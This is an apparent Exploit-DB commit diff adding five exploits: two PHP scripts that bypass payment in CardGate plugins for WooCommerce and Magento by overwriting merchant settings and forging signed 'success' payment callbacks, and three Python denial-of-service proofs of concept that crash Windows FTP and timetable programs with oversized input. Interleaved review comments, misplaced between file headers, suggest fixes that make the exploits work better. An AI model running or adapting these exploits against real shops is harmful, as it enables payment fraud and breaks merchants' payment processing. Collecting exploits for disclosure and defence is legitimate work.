From 17bb415ff83f3acfe9fa61bf5ebf34432f09789d Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 26 Feb 2020 05:01:51 +0000 Subject: [PATCH] DB: 2020-02-26 5 changes to exploits/shellcodes SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC) aSc TimeTables 2020.11.4 - Denial of Service (PoC) Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC) WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass --- exploits/php/webapps/48134.php | 174 ++++++++++++++++++++++++++++++++ exploits/php/webapps/48135.php | 178 +++++++++++++++++++++++++++++++++ exploits/windows/dos/48132.py | 27 +++++ exploits/windows/dos/48133.py | 32 ++++++ exploits/windows/dos/48136.py | 32 ++++++ files_exploits.csv | 5 + 6 files changed, 448 insertions(+) create mode 100644 exploits/php/webapps/48134.php create mode 100644 exploits/php/webapps/48135.php create mode 100755 exploits/windows/dos/48132.py create mode 100755 exploits/windows/dos/48133.py create mode 100755 exploits/windows/dos/48136.py
diff --git a/exploits/php/webapps/48134.php b/exploits/php/webapps/48134.php
new file mode 100644
index 000000000..93913c487
--- /dev/null
+++ b/exploits/php/webapps/48134.php
@@ -0,0 +1,174 @@
+# Exploit Title: WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass
+# Discovery Date: 2020-02-02
+# Public Disclosure Date: 2020-02-22
+# Exploit Author: GeekHack
+# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
+# Software Link: https://github.com/cardgate/woocommerce/releases/tag/v3.1.15
+# Version: <= 3.1.15
+# Tested on: WordPress 5.3.2 + WooCommerce 3.9.1 + CardGate Payment Gateway Plugin 3.1.15
+# CVE: CVE-2020-8819
+
+ $_REQUEST['testmode'],
+ 'reference' => random_int(10000000000, 99999999999) . ORDER,
+ 'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
+ 'currency' => '',
+ 'amount' => 0,
+ 'status' => 'success',
+ 'code' => 200
+ ];
+ $payload['hash'] = md5(
+ (!empty($payload['testmode']) ? 'TEST' : '')
+ . $payload['transaction']
+ . $payload['currency']
+ . $payload['amount']
+ . $payload['reference']
+ . $payload['code']
+ . $aConfigData['site_key']
+ );
+ $response = doRequest(TARGET . '/?cgp_notify=true', $payload);
+ if ($response == $payload['transaction'] . '.' . $payload['code']) {
+ die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+ } else {
+ throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");
+ }
+ } else {
+ die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+ }
+ } else {
+ throw new Exception("It seems target is not vulnerable ($response)");
+ }
+ } catch (\Exception $oException_) {
+ die(htmlspecialchars($oException_->getMessage()));
+ }
+}
\ No newline at end of file
diff --git a/exploits/php/webapps/48135.php b/exploits/php/webapps/48135.php
new file mode 100644
index 000000000..c7cea2d81
--- /dev/null
+++ b/exploits/php/webapps/48135.php
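Review bot: This PoC is destructive against the target rather than a read-only check: the message in `throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)")` shows that by the time the forged `cgp_notify` callback is sent, the site's CardGate merchant settings (including the `site_key` that feeds the md5 above) appear to have already been overwritten, which breaks real payment processing for that store. The header should say so, e.g. `# Note: this PoC overwrites the target's CardGate merchant settings (merchant/site_id/site_key) before forging the callback; run it only against a disposable test install.` Separately, the line reading `$_REQUEST['testmode']` (its array key is cut off in this rendering) dereferences the parameter unguarded, so PHP emits a notice whenever it is absent; `$_REQUEST['testmode'] ?? ''` avoids that and leaves the later `!empty()` check unchanged. The top of the file, including doRequest, $aConfigData, the TARGET/ORDER constants and the step that updates the merchant settings, is not visible in this hunk as rendered.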
@@ -0,0 +1,178 @@
+# Exploit Title: Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass
+# Discovery Date: 2020-02-02
+# Public Disclosure Date: 2020-02-22
+# Exploit Author: GeekHack
+# Vendor Homepage: https://www.cardgate.com (www.curopayments.com)
+# Software Link: https://github.com/cardgate/magento2/releases/tag/v2.0.30
+# Version: <= 2.0.30
+# Tested on: Magento 2.3.4 + CardGate Payment Gateway Module 2.0.30
+# CVE: CVE-2020-8818
+
+ $_REQUEST['testmode'],
+ 'reference' => ORDER,
+ 'transaction' => 'T' . str_pad(time(), 11, random_int(0, 9)),
+ 'currency' => ORDER_CURRENCY,
+ 'amount' => ORDER_AMOUNT * 100,
+ 'status' => 'success',
+ 'code' => 200,
+ 'pt' => ORDER_PAYMENT_TYPE
+ ];
+ $payload['hash'] = md5(
+ (!empty($payload['testmode']) ? 'TEST' : '')
+ . $payload['transaction']
+ . $payload['currency']
+ . $payload['amount']
+ . $payload['reference']
+ . $payload['code']
+ . $aConfigData['site_key']
+ );
+ $response = doRequest(TARGET . '/cardgate/payment/callback', $payload, 'GET');
+ if ($response == $payload['transaction'] . '.' . $payload['code']) {
+ die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+ } else {
+ throw new Exception("Unable to spoof order status, but merchant settings was updated successfully ($response)");
+ }
+ } else {
+ die($aConfigData['merchant'] . '.' . $aConfigData['site_id'] . '.200');
+ }
+ } else {
+ throw new Exception("It seems target is not vulnerable ($response)");
+ }
+ } catch (\Exception $oException_) {
+ die(htmlspecialchars($oException_->getMessage()));
+ }
+}
\ No newline at end of file
diff --git a/exploits/windows/dos/48132.py b/exploits/windows/dos/48132.py
new file mode 100755
index 000000000..366640f70
--- /dev/null
+++ b/exploits/windows/dos/48132.py
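Review bot: The title on the first line, `Magento WooCommerce CardGate Payment Gateway 2.0.30`, mixes up the two products: WooCommerce is the WordPress plugin covered by the sibling 48134.php, while the Software Link here points at `cardgate/magento2` and the tested stack is Magento 2.3.4, so it should read `# Exploit Title: Magento 2 CardGate Payment Gateway 2.0.30 - Payment Process Bypass` (the files_exploits.csv entry copies the same wrong title). A second, hedged point: `'amount' => ORDER_AMOUNT * 100` puts a float into both the GET query string and the md5 input, so the value the target ends up hashing depends on PHP's float-to-string conversion (the `precision` ini setting); `(int) round(ORDER_AMOUNT * 100)` pins it to the integer cents the module presumably compares against. As with 48134.php, the top of the file (doRequest, $aConfigData, the ORDER_* constants and the merchant-settings update) is not visible in this hunk, and the same unguarded `$_REQUEST['testmode']` read applies.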
@@ -0,0 +1,27 @@
+# Exploit Title: SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)
+# Date: 2020-24-02
+# Exploit Author: Ismael Nava
+# Vendor Homepage: http://www.nsauditor.com/
+# Software Link: http://www.nsauditor.com/spotftp.html
+# Version: 2.4.8
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+#STEPS
+# Open the program SpotFTP-FTP Password Recover
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "RandomLetter.txt"
+# Click in the Enter Registration Code
+# In the field Key put the content of the file "RandomLetter.txt"
+# End :)
+
+buffer = 'Z' * 1000
+
+try:
+ file = open("RandomLetter.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
diff --git a/exploits/windows/dos/48133.py b/exploits/windows/dos/48133.py
new file mode 100755
index 000000000..c0ada5cdb
--- /dev/null
+++ b/exploits/windows/dos/48133.py
@@ -0,0 +1,32 @@
+# Exploit Title: aSc TimeTables 2020.11.4 - Denial of Service (PoC)
+# Date: 2020-24-02
+# Exploit Author: Ismael Nava
+# Vendor Homepage: https://www.asctimetables.com/#!/home
+# Software Link: https://www.asctimetables.com/#!/home/download
+# Version: 2020.11.4
+# Tested on: Windows 10 Home x64
+# CVE : n/a
+
+# STEPS
+# Open the program aSc Timetables 2020
+# In File select the option New
+# Put any letter in the fiel Name of the Schooland click Next
+# In the next Windows click NEXT
+# In the Step 3, in Subject click in New
+# Run the python exploit script, it will create a new .txt files
+# Copy the content of the file "Tables.txt"
+# Paste the content in the field Subject title
+# Click in OK
+# End :)
+
+
+buffer = 'Z' * 1000
+
+try:
+ file = open("Tables.txt","w")
+ file.write(buffer)
+ file.close()
+
+ print("Archive ready")
+except:
+ print("Archive no ready")
\ No newline at end of file
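Review bot: `# Date: 2020-24-02` in the header is not a valid date (month 24); files_exploits.csv dates this entry 2020-02-25, so the line should be `# Date: 2020-02-24` or `# Date: 2020-02-25`, whichever is right. The bare `except:` at the end hides why the write failed, catching OSError and KeyboardInterrupt alike; `except OSError as exc:` with `print("Archive no ready: %s" % exc)` keeps the flow and reports the cause. For a DoS PoC the header should also record what was observed at the crash (exception type, faulting module or address, or just an unresponsive dialog), because 1000 'Z' pasted into the registration-code field says nothing on its own about exploitability.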
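Review bot: Same header defect as 48132.py: `# Date: 2020-24-02` is not a valid date and disagrees with the 2020-02-25 recorded in files_exploits.csv. The reproduction steps carry typos that matter when following them (`# Put any letter in the fiel Name of the Schooland click Next` should read `# Put any letter in the field Name of the School and click Next`), and the steps stop at "Click in OK" without saying what the crash looks like (exception type, faulting module), which is the one thing a triager needs. The trailing bare `except:` should be narrowed to `except OSError as exc:` so a failed write reports its reason instead of the generic "Archive no ready".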
diff --git a/exploits/windows/dos/48136.py b/exploits/windows/dos/48136.py
new file mode 100755
index 000000000..e6ede85fe
--- /dev/null
+++ b/exploits/windows/dos/48136.py
@@ -0,0 +1,32 @@
+# Exploit Title : Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)
+# Exploit Author : Berat Isler
+# Date : 2020-02-25
+# Vendor Homepage : https://odin-secure-ftp-expert.jaleco.com/
+# Software Link Download :
+http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
+# Version : Odin Secure FTP Expert 7.6.3
+# Tested on : Windows 7 32-bit
+
+# First step , run exploit script, it will generate a new file with the
+name "bune.txt"
+# Then start Odin Secure FTP application and find the "connect" tab . After
+that you can click
+Quickconnect site tab.
+# After that paste the content of "bune.txt" in to the all fields like this
+--> "AAAAAA" than click connect button
+# Application will be crash .
+
+This is the generated payload code :
+
+#!/usr/bin/python
+
+bune = "A" * 6000
+payload = bune
+try:
+f=open("bune.txt","w")
+print "[+] Creating %s bytes payload generated .. .. .." %len(payload)
+f.write(payload)
+f.close()
+print "[+] File created "
+except:
+print "File cannot be created"
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 8d4b7d2cb..006e2dde2 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
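Review bot: As committed this file is not runnable Python, so the PoC never writes bune.txt: the e-mail-wrapped continuation lines (`http://tr.oldversion.com/...`, `name "bune.txt"`, `that you can click`, `Quickconnect site tab.`, `--> "AAAAAA" than click connect button`) and `This is the generated payload code :` sit outside any `#` comment, and the body of `try:`/`except:` from `f=open("bune.txt","w")` to the last `print` is not indented, which fails at parse time. The `print "..."` statements are Python 2 only as well, while the other PoCs in this commit use `print()`. The rewrite below comments out the prose, indents the handler bodies, uses a context manager and narrows the except; the emitted strings are unchanged.
```python
# … unchanged: Exploit Title / Author / Date / Vendor Homepage header lines …
# Software Link Download :
# http://tr.oldversion.com/windows/odin-secure-ftp-expert-7-6-3
# … unchanged: Version / Tested on header lines …
# First step , run exploit script, it will generate a new file with the
# name "bune.txt"
# Then start Odin Secure FTP application and find the "connect" tab . After
# that you can click
# Quickconnect site tab.
# After that paste the content of "bune.txt" in to the all fields like this
# --> "AAAAAA" than click connect button
# Application will be crash .

# This is the generated payload code :

bune = "A" * 6000
payload = bune
try:
    with open("bune.txt", "w") as f:
        print("[+] Creating %s bytes payload generated .. .. .." % len(payload))
        f.write(payload)
    print("[+] File created ")
except OSError as exc:
    print("File cannot be created: %s" % exc)
```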
@@ -6681,6 +6681,9 @@ id,file,description,date,author,type,platform,port
 48100,exploits/windows/dos/48100.py,"Core FTP Lite 1.3 - Denial of Service (PoC)",2020-02-20,"berat isler",dos,windows,
 48111,exploits/windows/dos/48111.py,"Quick N Easy Web Server 3.3.8 - Denial of Service (PoC)",2020-02-24,"Cody Winkler",dos,windows,
 48121,exploits/linux/dos/48121.py,"Go SSH servers 0.0.2 - Denial of Service (PoC)",2020-02-24,"Mark Adams",dos,linux,
+48132,exploits/windows/dos/48132.py,"SpotFTP-FTP Password Recover 2.4.8 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
+48133,exploits/windows/dos/48133.py,"aSc TimeTables 2020.11.4 - Denial of Service (PoC)",2020-02-25,"Ismael Nava",dos,windows,
+48136,exploits/windows/dos/48136.py,"Odin Secure FTP Expert 7.6.3 - Denial of Service (PoC)",2020-02-25,"berat isler",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -42399,3 +42402,5 @@ id,file,description,date,author,type,platform,port
 48125,exploits/aspx/webapps/48125.txt,"DotNetNuke 9.5 - File Upload Restrictions Bypass",2020-02-24,"Sajjad Pourali",webapps,aspx,
 48127,exploits/hardware/webapps/48127.pl,"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure",2020-02-24,"Todor Donev",webapps,hardware,
 48128,exploits/php/webapps/48128.py,"Cacti 1.2.8 - Remote Code Execution",2020-02-24,Askar,webapps,php,
+48134,exploits/php/webapps/48134.php,"WordPress Plugin WooCommerce CardGate Payment Gateway 3.1.15 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,
+48135,exploits/php/webapps/48135.php,"Magento WooCommerce CardGate Payment Gateway 2.0.30 - Payment Process Bypass",2020-02-25,GeekHack,webapps,php,